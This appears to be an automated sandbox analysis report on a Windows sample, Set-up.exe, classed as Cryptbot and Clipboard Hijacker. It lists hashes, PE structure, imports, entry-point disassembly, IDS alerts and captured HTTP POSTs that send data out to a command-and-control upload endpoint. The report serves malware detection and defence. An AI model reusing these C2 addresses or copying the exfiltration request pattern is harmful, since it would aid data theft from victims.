	channel3.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vs.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vs.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BELCLOUDBG	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	Unknown	Browse	86.106.93.104
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	Unknown	Browse	86.106.93.104

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05435888001096333
Encrypted:	false
SSDEEP:	24576:FDEHgBO/vtLYgCIPScl78IsBDIhTb8EWDnflTfknVz0rIQldVE:EMIN3WDnxf6Vo1ldVE
MD5:	4757BED3A9869B39F876B90939E373FC
SHA1:	5F20B21ED6C60E0004D2473BD5D91FCC72F213A1
SHA-256:	4409ADAF3D24CC28ADA1953F946A5F42453C536BFC3D402B2ADCCA6A9D4D7CF8
SHA-512:	6DD11BBA0461702C66638DC097E37B7E58AA96EEFDCD1D856D52B125591C6D20295A0CC1EEDF8BB6DE13D9D172215A3141E148CF5BAFB51C95774468C7CE18C4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(...........................c.........................@......\|.....@... .........................`.......................................Lz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..0...........................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Lz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405998898324786
Encrypted:	false
SSDEEP:
MD5:	374EA50194727C58BB86AD240B785CB6
SHA1:	A1107E0B9F1C590DFB34FB1D868AE53167C1B45B
SHA-256:	3A0C9F77339C3C4329D602C592C75CC980482A423F38E69D16FE24D6158810D7
SHA-512:	554F6595CECFA44A6B9876EE500DD42FAC8897742ED5B606EB15AC3277EABA641A3FC0241C5A82438782B213F0A99A99A2EBC37A424FF20958D06959B4F3D30F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..f...............(.v........................@.......................... ...........@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.783791186500191
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	9'979'392 bytes
MD5:	d9bdb4ba2a45c67f4da4e431ff988605
SHA1:	4cdd27ca0a92a35e5eea6e588422339bdd9b05ba
SHA256:	9e61196ade3f31620d62422741e66bd19f0bd4744e2f6a5f8a2481cfb8f9b9d9
SHA512:	158db8f37207b0e33738dee684247f1feed9cadabdc64e5edd0aad1525a58419e4f5944b71197aac9d1d4e398f4467b3d92f54459ebacdb02ad51ba3a0efe906
SSDEEP:	49152:nrKPo82V5LYBuqHcnifzmg3I+ajuxueO63nsk0FAIp5a2GWPi/LbLo4xBxh:nrKw8qJYuq8xH+aj
TLSH:	94A6C562DD8791FEE19309B89006F37F1A34AB05881DC63DDF44DB91DBB2A7CD4AA016
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-..f...............(..,..B...............0,...@.................................2.....@... ......................0..B..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F81E2D [Sat Sep 28 15:18:05 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D42070h], 00000001h
jmp 00007FF8B8D6BA66h
nop
mov dword ptr [00D42070h], 00000000h
jmp 00007FF8B8D6BA56h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FF8B8D7A166h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D35000h
call dword ptr [00D4422Ch]
sub esp, 04h
test eax, eax
je 00007FF8B8D6BE25h
mov ebx, eax
mov dword ptr [esp], 00D35000h
call dword ptr [00D4424Ch]
mov edi, dword ptr [00D44234h]
sub esp, 04h
mov dword ptr [00D42028h], eax
mov dword ptr [esp+04h], 00D35013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D35029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C3004h], eax
test esi, esi
je 00007FF8B8D6BDC3h
mov dword ptr [esp+04h], 00D4202Ch
mov dword ptr [esp], 00D3F104h
call esi
mov dword ptr [esp], 00401580h
call 00007FF8B8D6BD13h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x943000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x944000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x947000	0x44438	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x93dcc4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94420c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c1628	0x2c1800	526444c6588cc788ffb21129425288e5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c3000	0x671144	0x671200	9e76db93b5d3f797cd8e6754c92c96a9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x935000	0x9df4	0x9e00	df7c142bc35a358f012a32466206865e	False	0.37853540348101267	data	4.418148414663874	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x93f000	0x21d8	0x2200	b676dfac7e02e18a9333e2ac972177a9	False	0.3249080882352941	data	4.8550927110252	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x942000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x943000	0x42	0x200	3e5c9d9f8bb19fec51f636d1365ce197	False	0.123046875	data	0.7196023924362801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x944000	0xa98	0xc00	f087d11a757393473d71d554d42efe81	False	0.3818359375	data	4.796805098760762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x945000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x946000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x947000	0x44438	0x44600	b7ba2f2aa1fe2ea3d0bba618b8cd2e51	False	0.22078167847349178	data	6.836263814441563	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5adc60

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-29T00:45:17.911272+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49730	185.244.181.140	80	TCP
2024-09-29T00:45:21.333251+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49732	185.244.181.140	80	TCP
2024-09-29T00:45:26.200833+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49738	185.244.181.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:45:17.168848991 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.175333977 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:17.175424099 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.175617933 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.175643921 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.182071924 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:17.182082891 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:17.911117077 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:17.911202908 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:17.911272049 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.911480904 CEST	49730	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:17.916558981 CEST	80	49730	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.262368917 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.269315958 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.269531012 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.269712925 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.269869089 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.277122021 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.277153969 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.277163982 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.277173042 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.277250051 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.279675961 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.279685974 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.279694080 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.279758930 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.279776096 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.280237913 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.282378912 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.284220934 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.284503937 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.284558058 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.284606934 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.284614086 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.284645081 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.284917116 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.285058022 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.285067081 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.285073996 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.285226107 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.332890034 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.333250999 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.388820887 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.389009953 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.436867952 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.436939955 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.485160112 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.485266924 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:21.532785892 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:21.749424934 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:22.213571072 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:22.213763952 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:22.213814974 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:22.215091944 CEST	49732	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:22.222968102 CEST	80	49732	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.375463963 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.382353067 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.382424116 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.422115088 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.422158957 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.428859949 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.428872108 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.428886890 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.428894997 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.428904057 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.428942919 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.428988934 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.431210041 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.431219101 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.431226969 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.431235075 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.431242943 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.431247950 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.431277990 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:25.435759068 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.435766935 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.435774088 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.435781956 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.435790062 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.435796976 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:25.476814985 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:26.200598955 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:26.200803041 CEST	80	49738	185.244.181.140	192.168.2.4
Sep 29, 2024 00:45:26.200833082 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:26.200951099 CEST	49738	80	192.168.2.4	185.244.181.140
Sep 29, 2024 00:45:26.207030058 CEST	80	49738	185.244.181.140	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:45:16.514967918 CEST	58392	53	192.168.2.4	1.1.1.1
Sep 29, 2024 00:45:17.163665056 CEST	53	58392	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2024 00:45:16.514967918 CEST	192.168.2.4	1.1.1.1	0x9323	Standard query (0)	elevenvh11pt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2024 00:45:17.163665056 CEST	1.1.1.1	192.168.2.4	0x9323	No error (0)	elevenvh11pt.top		185.244.181.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

elevenvh11pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.244.181.140	80	7100	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:45:17.175617933 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary33730321 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 410 Host: elevenvh11pt.top
Sep 29, 2024 00:45:17.175643921 CEST	410	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 33 37 33 30 33 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 69 73 Data Ascii: ------Boundary33730321Content-Disposition: form-data; name="file"; filename="Sisayi.bin"Content-Type: application/octet-streammdD2<]_x?.pMj1rdk}\/9gg$8R:I_z.=9LR3e;v2mY 64uc$8hj
Sep 29, 2024 00:45:17.911117077 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:45:17 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.244.181.140	80	7100	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:45:21.269712925 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary17398190 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 89745 Host: elevenvh11pt.top
Sep 29, 2024 00:45:21.269869089 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 37 33 39 38 31 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 69 6b Data Ascii: ------Boundary17398190Content-Disposition: form-data; name="file"; filename="Kikokikaq.bin"Content-Type: application/octet-streamsUg.`lh^e\Zxm5mIG~W4ATyUtR3~gvjdp
Sep 29, 2024 00:45:21.277250051 CEST	8652	OUT	Data Raw: 4f 2f 71 10 c3 d5 bf 16 a5 41 4c 9a 90 8d df 3d d3 c9 ed 12 ec da 26 09 d4 e7 bc f2 4b 6e e7 0f 08 5a 29 85 9b 29 75 09 41 d9 df 95 f2 f7 10 83 e0 08 72 a9 4e 70 08 76 d4 2d 90 ff 3f 66 7b 78 93 75 52 b7 48 35 eb f7 0b 09 ac 84 0a d3 a8 9a c1 1a Data Ascii: O/qAL=&KnZ))uArNpv-?f{xuRH5RrxE4^TZ,@>qg7%:xbgs>'8TpvvC3q_KIbtt$CU6?<f\\9^c18zkgyI}"
Sep 29, 2024 00:45:21.279758930 CEST	7416	OUT	Data Raw: 33 a5 ce c5 66 36 7f 0e db 9e 0e 58 e0 de 9d d3 df 8e 87 fe 1f df a8 9c ef a0 53 3f 47 e1 9f d1 29 24 51 cb 40 8f ba 7b bf 8c 7a 5e 3d ab 83 b1 e2 48 ca 81 bb af 06 bf ca ae ab ae 2c b4 b0 fb ca a2 c0 7a 37 71 e3 03 c5 44 93 eb 16 2a ce 49 a7 6b Data Ascii: 3f6XS?G)$Q@{z^=H,z7qD*Ik#jDP>VxWk4}P@NZ\|[N?KI1<{)+)_U)>F \N Ek5^HON'V#bE^qs=<B9Xff[OQ.SJ
Sep 29, 2024 00:45:21.280237913 CEST	2472	OUT	Data Raw: 4c 26 f8 3d a7 a7 7b 65 bf bc f3 7c 11 22 9b f7 31 e0 23 bd 70 9a 17 74 90 6b 7e b7 fb 3a c6 c2 da fd 80 f7 0d 0a 87 32 0c 10 94 ba 82 f2 92 a3 c8 cf 39 fb 5c 57 53 14 8d 23 c9 77 73 82 3e 60 23 6d f9 47 69 93 d0 4f 00 95 50 91 76 a3 90 fa a9 21 Data Ascii: L&={e\|"1#ptk~:29\WS#ws>`#mGiOPv!?$@VuXfueR_V8*5FQ]/Po!1DKyl-e,"Tkqs\_Ru1-^=M7OUHN}Q;.;{jR2?oF(
Sep 29, 2024 00:45:21.284220934 CEST	2472	OUT	Data Raw: 50 7b 14 10 87 fc 59 ff 2e cd 10 9e dd 95 40 7b fa 7d e2 31 8b 41 62 fe e9 21 36 2a 4e 62 eb 2a a9 5a 9c d7 b5 0c 3c 9b e9 b4 a8 5e 91 34 3d 20 9e 8d d3 82 d0 72 16 23 1a 7b c8 43 12 28 16 79 8d 44 54 98 90 08 3e b1 98 62 ab 08 30 cf 76 64 0e 37 Data Ascii: P{Y.@{}1Ab!6NbZ<^4= r#{C(yDT>b0vd7BDRB5//%&2Jl\RxqzxRQ^<&47W!w?U_{sF2$*fBNt"tK})Fa1`i&Ex.\@K/xR4;!VO2:w
Sep 29, 2024 00:45:21.284645081 CEST	4944	OUT	Data Raw: 79 76 cc 5f 4d 59 39 78 a4 21 3a 0b e3 4a 51 d1 e4 b9 c0 6d c6 e3 c5 85 a3 3e b4 d5 59 c1 79 44 ee d7 a3 74 49 3a 89 dc 9b 49 fc a3 9c 72 68 bf 97 ed 39 0a b9 43 9c 68 01 61 7f 30 a3 ba 7e d6 77 6e 08 86 57 3c 70 01 ea e9 3b 24 6a f6 a5 11 f2 24 Data Ascii: yv_MY9x!:JQm>YyDtI:Irh9Cha0~wnW<p;$j$/m=hy%jHw~\|wl8n>7>0l:![B{}X"kMNNNoLM]xqegI\|VM'U(:,b5wtmRA"\9
Sep 29, 2024 00:45:21.284917116 CEST	4944	OUT	Data Raw: fc bf fd 36 aa a3 6a 29 3c 32 b7 b1 a6 1b 04 ff bb c1 42 c6 60 4d 75 53 59 38 e3 a5 90 c4 a3 6f 55 af fa 15 f8 bc 2d 65 4b eb 0d 8e e4 5a 9e 9e d9 a5 79 1a bd e9 7e be 9c 8a 3c 08 85 82 7a f5 db 27 8e a1 2e 04 12 64 73 69 d2 40 cc fa 16 da 33 e4 Data Ascii: 6j)<2B`MuSY8oU-eKZy~<z'.dsi@3JAAG[{HK\f]K)vn Z>Vs-g#94,yV/[<t:1<4 h+kQ;~Iqp (3Q?@G$Lf-
Sep 29, 2024 00:45:21.285226107 CEST	7416	OUT	Data Raw: e0 7c c4 e1 cc bc 3f d6 d0 0c 61 cd 75 c7 96 da 4b ff c0 49 9d a1 76 1d 6c 27 e7 8c f8 f8 58 8d 44 70 d2 78 63 71 ae 12 10 ef b3 a9 5a b5 68 c6 74 2c 74 b0 11 49 99 d3 ba ac ef fc 9f f5 e0 6c 22 24 66 71 c8 4b 37 5f fd a4 f1 86 4c 8b 75 7c 02 df Data Ascii: \|?auKIvl'XDpxcqZht,tIl"$fqK7_Lu\|;z%N?Gn82CFfc<(7s8]A)U< 'Q gVB_?,-^yH/DcA*\4@N/A$U"E+N)U
Sep 29, 2024 00:45:21.333250999 CEST	35844	OUT	Data Raw: f8 66 37 75 4d 53 22 15 9e 09 90 a5 60 b5 b3 8a 19 a3 c7 7c b9 e9 96 b8 02 10 0d 4a f1 2d 2b f7 df 33 ac 4c 3b b9 8f a8 1a ad b8 39 19 27 8d cd 33 db d6 c7 4b 27 fa ef f5 df 04 1e bb 51 fa 37 ef 16 7b 76 30 27 7b 1b de f8 45 7d ee cb 2b c0 3f 2a Data Ascii: f7uMS"`\|J-+3L;9'3K'Q7{v0'{E}+?OYT&fjhpfx k V hLqWUviaX[aB_2%7yR1 b$B7VmG$etueg_zq;9jBj.)co? }
